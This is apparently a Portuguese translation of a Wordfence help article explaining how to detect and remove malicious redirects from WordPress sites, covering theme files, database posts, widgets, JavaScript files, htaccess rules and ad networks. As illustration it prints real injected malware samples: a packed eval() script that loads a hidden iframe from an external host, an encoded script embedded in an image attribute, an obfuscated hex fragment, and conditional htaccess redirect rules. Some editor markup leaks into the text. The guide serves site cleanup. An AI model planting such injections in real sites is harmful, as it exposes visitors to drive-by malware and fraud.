O que é um redirecionamento malicioso?
Um redirecionamento mal-intencionado é um código inserido em um site com a intenção de redirecionar o visitante do site para outro site. Geralmente, os redirecionamentos mal-intencionados são inseridos em um site por invasores com a intenção de gerar impressões de publicidade. No entanto, alguns redirecionamentos mal-intencionados podem ter mais efeitos prejudiciais. Um redirecionamento mal-intencionado pode explorar vulnerabilidades no computador de um visitante do site por meio de scripts baseados na Web para instalar malware em máquinas desprotegidas. Dessa forma, é essencial remover redirecionamentos mal-intencionados do seu site.
Determinando se seu site está infectado
A maioria dos proprietários de sites não sabe que o site está redirecionando os visitantes. Muitas vezes, eles primeiro descobrem o redirecionamento quando um cliente diz que acabou em um canto indesejável da Internet quando tentava visitar o site. O proprietário de um site pode até tentar replicar o problema, apenas para ver que tudo parece bem para ele em seu computador, enquanto os visitantes do site em plataformas móveis experimentam atividades mal-intencionadas. O redirecionamento pode acontecer em algumas páginas e não em outras. Ou pode acontecer antes que o site seja carregado.
Se o Wordfence identificou seu site como tendo um ou mais redirecionamentos mal-intencionados, há algumas etapas que você pode seguir para remover o redirecionamento mal-intencionado e restaurar seu site para a funcionalidade normal.
Localizando e Removendo Redirecionamentos Maliciosos
Antes de fazer alterações nos arquivos ou banco de dados do seu site, recomendamos fazer o backup de todos os arquivos do site em um local seguro, especialmente se você não estiver familiarizado com o funcionamento interno do seu sistema de gerenciamento de conteúdo (CMS).
Um redirecionamento mal-intencionado pode ser inserido em qualquer lugar no seu site – arquivos do site ou até mesmo no seu banco de dados.
Aqui estão alguns dos redirecionamentos maliciosos geralmente detectados por nossas verificações e algumas instruções sobre como removê-los.
Inserções de Javascript nos arquivos do seu site.
Em sites WordPress, vemos entradas de javascript colocadas em arquivos de tema. Normalmente, vamos encontrá-los no cabeçalho do tema, geralmente logo acima da tag. Mas eles podem estar em outro lugar nos arquivos do site.
Um script normalmente encontrado no cabeçalho pode se parecer com o seguinte:
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k)}}return p}(‘i 9(){a=6.h(\’b\’);7(!a){5 0=6.j(\’k\’);6.g.l(0);0.n=\’b\’;0.4.d=\’8\’;0.4.c=\’8\’;0.4.e=\’f\’;0.m=\’w://z.o.B/C.D?t=E\’}}5 2=A.x.q();7(((2.3(“p”)!=-1&&2.3(“r”)==-1&&2.3(“s”)==-1))&&2.3(“v”)!=-1){5 t=u(“9()”,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732′.split(‘|’),0,{}))
</script><img src=”data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7″ data-wp-preserve=”%3Cscript%26gt%3Bvar%20ar%3D%22%3D2%7DCd8%20pvsyw%3AAlEeTcBNfb6u%26gt%3B1%26lt%3B%2C)h.r3’niao0%20g%3B%2F%7Bm%5B%5C%22(t%5D%22%3Btry%7B’qwe’.length(1)%3B%7Dcatch(a)%7Bk%3Dnew%20Boolean().toString()%3Bdate%3Dnew%20Date()%3B%7D%3Bvar%20ar2%3D%22f120%2C120%2C108%2C63%2C18%2C144%2C12%2C114%2C54%2C72%2C135%2C48%2C105%2C147%2C93%2C123%2C48%2C147%2C45%2C42%2C48%2C135%2C48%2C105%2C147%2C%2027%2C57%2C30%2C51%2C111%2C123%2C60%2C111%2C135%2C48%2C144%2C102%2C66%2C114%2C12%2C30%2C102%2C87%2C138%2C117%2C150%2C87%2C132%2C120%2C120%2C120%2C%20…%0A%5B%2Fjs%5D%3C%2Fpre%3E%0A%3Cp%3EA%20malicious%20script%20can%20look%20like%20a%20normal%20javascript%20included%20file.%3C%2Fp%3E%0A%3Cpre%3E%5Bjs%20gutter%3D%22false%22%20wraplines%3D%22true%22%5D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.%5Bredacted%5D.com%2Fanyscript.js%22%3E%3C%2Fscript%3E” data-mce-resize=”false” data-mce-placeholder=”1″ class=”mce-object” width=”20″ height=”20″ alt=”<script>” title=”<script>” />
Um script mal-intencionado também pode ser incluído em outro script.
$.getScript(‘http://www.[redacted].com/script.js’, function()
Determine qual script está executando o redirecionamento mal-intencionado. Nem todo JavaScript em seu site é malicioso, na verdade, a maior parte do javascript que você encontrará em seu site é parte da funcionalidade principal.
No Chrome, digite “view-source:” na frente do URL do site (por exemplo, view-source: http: //www.sitename.com) e pesquise por “<script” dentro do arquivo. Você pode procurar por outro código ou texto próximo ao script mal-intencionado para determinar qual arquivo de site contém o código malicioso.
Se for um arquivo de tema, você pode usar o editor de temas do seu site para remover o javascript ofensivo. Ou você pode baixar seu site via FTP ou o gerenciador de arquivos cpanel e fazer o upload do arquivo limpo de volta para o seu servidor.
Javascript inserido em páginas ou posts.
Muitas vezes, os invasores executam um script que insere o javascript em todas as postagens / páginas do seu site. Esses redirecionamentos não serão encontrados nos arquivos do site, mas sim no banco de dados do site. Pode haver mais de um script inserido. Pode ser uma página ou pode estar em todas elas. Esses scripts podem parecer com o mesmo script acima, mas esses redirecionamentos geralmente podem ser ofuscados (intencionalmente obscurecidos para tornar o código ambíguo).
Esses redirecionamentos mal-intencionados do javascript serão semelhantes aos exemplos de javascript acima.
Removendo este redirecionamento: Para remover este redirecionamento, existem algumas opções. Geralmente, esses redirecionamentos são inseridos em todos os posts do site. Os scripts podem ser removidos editando:
dentro do sistema de gerenciamento de conteúdo (por exemplo, via pós-edição do WordPress)
através de uma ferramenta de banco de dados como o PhpMyAdmin, que permite editar mais de uma página / postagem de cada vez.
através de um arquivo de texto baixado localmente e carregando as postagens limpas no banco de dados usando uma ferramenta de gerenciamento de SQL. Embora mais rápido, isso requer um nível de conhecimento técnico para trabalhar com SQL.
Javascript redireciona inserido em widgets.
Scripts maliciosos também podem ser inseridos em widgets.
Javascript ofuscado anexado a arquivos javascript.
Um invasor pode adicionar algumas linhas de javascript a alguns ou todos os arquivos javascript nos arquivos do site. Uma pesquisa de arquivos de site que procuram o URL para o qual o site está redirecionando pode não encontrar nenhum resultado porque esse javascript é geralmente ofuscado. Aqui está uma amostra:
var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x…
Removendo este redirecionamento: Para remover esse tipo de redirecionamento mal-intencionado, baixe o site inteiro usando um programa de FTP para o seu computador e procure o javascript ofensivo. Se você tiver uma ferramenta de desenvolvimento que permita varrer todos os arquivos do seu site, poderá descobrir que esse redirecionamento mal-intencionado foi inserido em todos os arquivos javascript do seu site. Verifique os arquivos .js e .json, incluindo arquivos principais, arquivos de tema, plug-ins etc. Depois de limpar todos os arquivos do site, faça o upload do site limpo de volta para o servidor.
Redirecionamentos inseridos em arquivos htaccess.
Um arquivo htaccess é um arquivo colocado em seu servidor que fornece diretivas ao servidor antes que os arquivos do seu site sejam acessados. Para um site WordPress, por exemplo, o arquivo htaccess irá dizer ao servidor para enviar solicitações para permalinks para o arquivo index.php principal do WordPress para manipulação. Outras diretivas podem ser colocadas em um arquivo htaccess, e é um local favorito para os invasores colocarem redirecionamentos mal-intencionados. Freqüentemente, esses tipos de redirecionamentos serão redirecionados com base no tipo de navegador ou dispositivo, ou pelo site que direcionou o visitante ao seu site (na maioria das vezes, a partir de um dos mecanismos de pesquisa) Um redirecionamento de htaccess pode ser assim:
RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi
Um redirecionamento de htaccess pode até mesmo redirecioná-lo com base no navegador (agente do usuário) ou no referenciador (o que enviou o visitante ao seu site). Aqui está uma amostra:
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms
Esses redirecionamentos podem ser difíceis de isolar e remover. A manipulação do arquivo htaccess pode fazer com que o site pare de funcionar ou crie erros que não fazem muito sentido, como um erro interno do servidor. Se você não estiver familiarizado com as diretivas dentro do arquivo htaccess, faz sentido obter ajuda .
Removendo este redirecionamento: Comece baixando o seu arquivo .htaccess. Seu gerenciador de arquivos cpanel pode não mostrar este arquivo “oculto”, e algumas vezes baixá-lo para o disco rígido do seu computador pode fazê-lo desaparecer, mesmo que você possa vê-lo em seu aplicativo FTP. Você precisará remover o redirecionamento, deixando para trás o código necessário para a operação do seu site. Isso pode ser dependente do provedor de hospedagem, já que muitas vezes há entradas em um arquivo de htaccess necessário para a funcionalidade do seu site.
Redes de anúncios
Algumas redes de publicidade são brandas em seus padrões para a publicidade que aceitam em sua rede. O site pode estar completamente livre de malware, mas uma rede de publicidade pode estar redirecionando os visitantes do site. Determinar qual rede de publicidade pode ser a culpada pode ser uma tarefa muito difícil, pois os redirecionamentos de publicidade maliciosa podem ser veiculados esporadicamente e imprevisivelmente.
Removendo este redirecionamento: Se um site estiver redirecionando seus visitantes maliciosamente, se você esgotar todas as outras opções e tiver redes de publicidade inseridas em seu site, a remoção dessas redes de anúncios poderá solucionar o problema de redirecionamento mal-intencionado.
Olhando além do redirecionamento
Não importa o tipo de redirecionamento encontrado em seu site, a grande questão é como ele chegou lá. É provável que você tenha outros tipos de malware ou vulnerabilidades de segurança em seu site que permitiram que um invasor tivesse acesso ao site e colocasse o redirecionamento mal-intencionado. Você pode ter backdoors , uploaders de arquivos maliciosos ou outros problemas no site.
Se, depois de ler este guia, você não tiver certeza de como remover o redirecionamento malicioso ou estiver procurando por mais respostas sobre como o código foi colocado em seu site, obtenha ajuda abrindo um pedido de ticket.
